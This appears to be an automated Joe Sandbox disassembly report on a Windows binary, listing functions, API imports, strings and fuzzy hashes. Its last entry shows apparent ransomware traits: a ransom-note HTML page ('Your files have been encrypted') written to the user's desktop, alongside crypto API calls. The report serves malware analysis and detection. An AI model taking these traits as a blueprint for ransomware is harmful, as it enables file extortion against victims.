Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 9498efe97fe3ec688b4231bec599c5eb75376a2b520db70b8affdfdc764f3ff7
Instruction ID: 4e9952a59ebeaffd1d062d293400cd16fe325c7386e15b22914be2981645968c
Opcode Fuzzy Hash: 9498efe97fe3ec688b4231bec599c5eb75376a2b520db70b8affdfdc764f3ff7
Instruction Fuzzy Hash: 5C110026B24F0689EB00DFB0E9552B833A4FB59798F441E35DA7D867A4EF78D1588340

Function 00007FF6F18CD1AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF6F18A1A95), ref: 00007FF6F18CD1D2
FormatMessageA.KERNEL32 ref: 00007FF6F18CD205

Strings

!x-sys-default-locale, xrefs: 00007FF6F18CD1C5

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 43d75ac8b8c5369e2375fa093142245e30a7d2e3037453ae26a2581796a37edf
Instruction ID: 7264a084d3806e650fac0210b6c712245c0ec9419d0ea94738fe0757cb2e9470
Opcode Fuzzy Hash: 43d75ac8b8c5369e2375fa093142245e30a7d2e3037453ae26a2581796a37edf
Instruction Fuzzy Hash: 2A01DB72F1878242E7108B11F54077A7752FB847D4F148236D56A87AC4EF3CD905C740

Function 00007FF6F18B78A0 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

BCryptCloseAlgorithmProvider.BCRYPT ref: 00007FF6F18B78C4

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: AlgorithmCloseCryptProvider
String ID:
API String ID: 3378198380-0
Opcode ID: 370630bd3626e48b24cfbb56d8db3a24df6a4d185cbec715511eae0b0ddbd303
Instruction ID: d087b468bff6f112f71fe0f641f5f28737ca3b405f6437b690a78e5d1add2a17
Opcode Fuzzy Hash: 370630bd3626e48b24cfbb56d8db3a24df6a4d185cbec715511eae0b0ddbd303
Instruction Fuzzy Hash: 56E09221B2974644EB54DB16F9512756250AF88BC0F188130D97D837D6EF3CD492C300

Function 00007FF6F18CCAB0 Relevance: 1.3, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6F18CCAD4

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 8a01b87f5694dc67e40291bceb467f5624d426113ae160122edc79cad3a0f334
Instruction ID: 8cc778664a21d3ea99be4ac0d41dfa85a1f008e8bb6ac2c1fd51144218917a58
Opcode Fuzzy Hash: 8a01b87f5694dc67e40291bceb467f5624d426113ae160122edc79cad3a0f334
Instruction Fuzzy Hash: C841A0B3910740CBD791DF38D181A6AB7B0FB19B88B19C722DB19D7258EB39E145CB40

Function 00007FF6F18B6E19 Relevance: .6, Instructions: 555COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e1d1deec42e54e056bb58acd170ec411746aeb02d7c35df045b385e7d347b1
Instruction ID: 9df0b35d937357f996930e45ebc2b783e3aab973710694bb92c0f39c650560ac
Opcode Fuzzy Hash: 41e1d1deec42e54e056bb58acd170ec411746aeb02d7c35df045b385e7d347b1
Instruction Fuzzy Hash: C022B873B256458BE768CF28D45066A77E1FB84784F559139DA6E83B84EF3CE801CB40

Function 00007FF6F18B6CFF Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d4fac35e72d34e683d5229c755eb25693b95cfc9d9eda9b44e0e8b2ccda6ff
Instruction ID: 553b95da1da658209d245b69c6139a8447417916c3b79bd065464cded25c2f37
Opcode Fuzzy Hash: 07d4fac35e72d34e683d5229c755eb25693b95cfc9d9eda9b44e0e8b2ccda6ff
Instruction Fuzzy Hash: D202D873A282458BE768CF15E44066E7BE1F784788F559138DA6E83B94EB7CD801CB44

Function 00007FF6F18CA0A0 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d683fe8cb674b6199210d948ac026ef8e1c8296f7cb5f75730215caca0fcdf27
Instruction ID: 931854725ce2ad9f9c806d271c496b90462d2dd2a5e37aff9b4e3459611a9491
Opcode Fuzzy Hash: d683fe8cb674b6199210d948ac026ef8e1c8296f7cb5f75730215caca0fcdf27
Instruction Fuzzy Hash: 5B224D62D29BC686F313973D64435B6E724AFFB6C4F24E316FED470C12EB6492858248

Function 00007FF6F18C42B0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e3b5d0e3884116b6a68681059af59239a48d0a81a61e32dc271f729a72e07a6
Instruction ID: 4ef9d85e40706de223cedad947d793e5b1bec48defcfbdaf84f274d427424ab6
Opcode Fuzzy Hash: 6e3b5d0e3884116b6a68681059af59239a48d0a81a61e32dc271f729a72e07a6
Instruction Fuzzy Hash: 7102F03252A1908FE344CF2A955417E7BE0F7A8795F80812AEFD687786C77DE809CB10

Function 00007FF6F18B67F0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f7c17e683d78467c2e5624951cd0d90116c53f82f42f7c942f9251b504e876a
Instruction ID: 86d76b6356ec20852492af5fd6f23fff31c3def58968f5bd06e23a2cb3af9acd
Opcode Fuzzy Hash: 1f7c17e683d78467c2e5624951cd0d90116c53f82f42f7c942f9251b504e876a
Instruction Fuzzy Hash: 5DE1C873A2859547E328CF19A40065ABBD1F7C8788F509139EEAB93F84EA7CD801CB44

Function 00007FF6F18CAC60 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7db49e21755299ff56554047cc675a5c5ade3a2900fba4c9b02cd1a20d59f68
Instruction ID: a2556fae035851ad2cb41f23731969ebd78652e8de131edfd7ac7cb779973d29
Opcode Fuzzy Hash: d7db49e21755299ff56554047cc675a5c5ade3a2900fba4c9b02cd1a20d59f68
Instruction Fuzzy Hash: E10240738261709AE781CB1ED049B6B33A9F744395F23833BDE9263281D637AC09D794

Function 00007FF6F18CC570 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99ea7e6900bb8866a17359a198d066e5fdaf4bfb547f946d92b658355bfeb258
Instruction ID: 68f56bab3b6c19f746140c6cbacd90232ef5e7d48ce45bf31c98151323e602cf
Opcode Fuzzy Hash: 99ea7e6900bb8866a17359a198d066e5fdaf4bfb547f946d92b658355bfeb258
Instruction Fuzzy Hash: E391BE33E19B8189E3118F7DE4416ED6761EB95398F149324EFD866E88EF38E54AC300

Function 00007FF6F18CAE76 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d286b13ffae1578e684bb1020083730452a778b0e1c4c2c8477c30c38cd9494
Instruction ID: 0f7ed38c837d2e162d576437d702ab8418ead4d666aa5311c3279dab9ddb8ca6
Opcode Fuzzy Hash: 9d286b13ffae1578e684bb1020083730452a778b0e1c4c2c8477c30c38cd9494
Instruction Fuzzy Hash: 44A12E338261709BD380CB1ED059B6F33A9F744395F23832BDE9267281D637AC0997A5

Function 00007FF6F18AF2A0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1437f749cac9f131c210edc142373da7746e7153ad876a3a88a91066ead9a5ca
Instruction ID: 587b39e85ee12d2cfdb68051926d22a6d2d930c39310e6f171406b8135e5ea70
Opcode Fuzzy Hash: 1437f749cac9f131c210edc142373da7746e7153ad876a3a88a91066ead9a5ca
Instruction Fuzzy Hash: 1451E477B057484BCB188F4AA94165AB695F3D8788B09903ADF5D87B90EA3CE9108740

Function 00007FF6F18CB2B8 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567a254704e10f6dd68a7fed4598a22d88dd831c12a43c28395db30b1de049dd
Instruction ID: b81033b0a2dd266bee4b4eb107fa93394ea1ad1bc29b1a0903a2e3adae62f2fa
Opcode Fuzzy Hash: 567a254704e10f6dd68a7fed4598a22d88dd831c12a43c28395db30b1de049dd
Instruction Fuzzy Hash: 7E514553648EE853D62E0B3DA5913E7E291EFD9309F11C315EFE127683E72EA148B610

Function 00007FF6F18C6A90 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef00e1892a952b848ac899107cb729ed9e19a0f58286baa20722f729c5578c79
Instruction ID: 7f113077980515bd6382eece4dd1c6921f46b5faf6ab8c82005930fb626399ae
Opcode Fuzzy Hash: ef00e1892a952b848ac899107cb729ed9e19a0f58286baa20722f729c5578c79
Instruction Fuzzy Hash: 9331ED32718B8886DB018B2AE480399AB94F7D5BD8F485239DE8D87B98DBB9D044C700

Function 00007FF6F18C40D0 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b38a2b101e259f6e254d093f64ece74e0218c2257faef28a11d3a33cb32a4e6e
Instruction ID: af76be151505ea3a2b2246ee1d0a2d0baffc6ba17470996c16129ff9dc1daa60
Opcode Fuzzy Hash: b38a2b101e259f6e254d093f64ece74e0218c2257faef28a11d3a33cb32a4e6e
Instruction Fuzzy Hash: 4831827231864845FB5DDA60AA7F7D6E99AA38C3C0F49F137DE964E658EE3CC141CA00

Function 00007FF6F18C5380 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 509e356a70a69fee75e6004179e37b9800559dc64f4470ea1333ea12fbfa7096
Instruction ID: f278f440ebfc5418aee7ebf7d96c1c317b7af8fe0a1247e526064bfc010c0d18
Opcode Fuzzy Hash: 509e356a70a69fee75e6004179e37b9800559dc64f4470ea1333ea12fbfa7096
Instruction Fuzzy Hash: EC214DA2F346B606DF12863B85848549A529FA73D0765E323FD3871DD5FB1BE1D18B00

Function 00007FF6F18CB538 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6cf7086033877038e98547aab7e423bf7c8cca03c2a5b6a100fcbf2f159150
Instruction ID: fc0d049b2dc5df9cd07b41cf2bb31fd53c09d3ff983adc2e2dbfe280787cb06f
Opcode Fuzzy Hash: 9a6cf7086033877038e98547aab7e423bf7c8cca03c2a5b6a100fcbf2f159150
Instruction Fuzzy Hash: 3E31FC53D16A9852E7136B3D530B3B7D3A2BBD43E9F318341DBC562A46EB3DA344A210

Function 00007FF6F18CEC6C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743753876.00007FF6F18A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F18A0000, based on PE: true

Associated: 00000000.00000002.1743740567.00007FF6F18A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743780540.00007FF6F18D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743800719.00007FF6F18E5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743814923.00007FF6F18E6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743828276.00007FF6F18E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1743842102.00007FF6F18EA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f18a0000_PC4rbXSgl4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d0fcaf2023bbb405993fb51d892c165668b09eb84f5d228c1ad3354ffab6a74
Instruction ID: 6bf61dbc681921339877d340fecf68607acddbaa2f18a97a2f90db46406aba9b
Opcode Fuzzy Hash: 2d0fcaf2023bbb405993fb51d892c165668b09eb84f5d228c1ad3354ffab6a74
Instruction Fuzzy Hash: 42A00121938D0390EB048B60AA90C702A21BB687C1B415132C03D910A0AF2CA4009200

Function 00007FF6F18A76A0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

_dupenv_s.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FF6F18A76EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A77A4
memset.VCRUNTIME140 ref: 00007FF6F18A77D0
??Bios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6F18A782F
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6F18A78AB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6F18A78B6
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6F18A78FD

Strings

<html><body><h1>Files Encrypted</h1><p>Your files have been encrypted.</p>, xrefs: 00007FF6F18A7839
</p></body></html>, xrefs: 00007FF6F18A7874
USERPROFILE, xrefs: 00007FF6F18A76DC
<p>Unique id: , xrefs: 00007FF6F18A784A
\Desktop\README.html, xrefs: 00007FF6F18A772C

Memory Dump Source

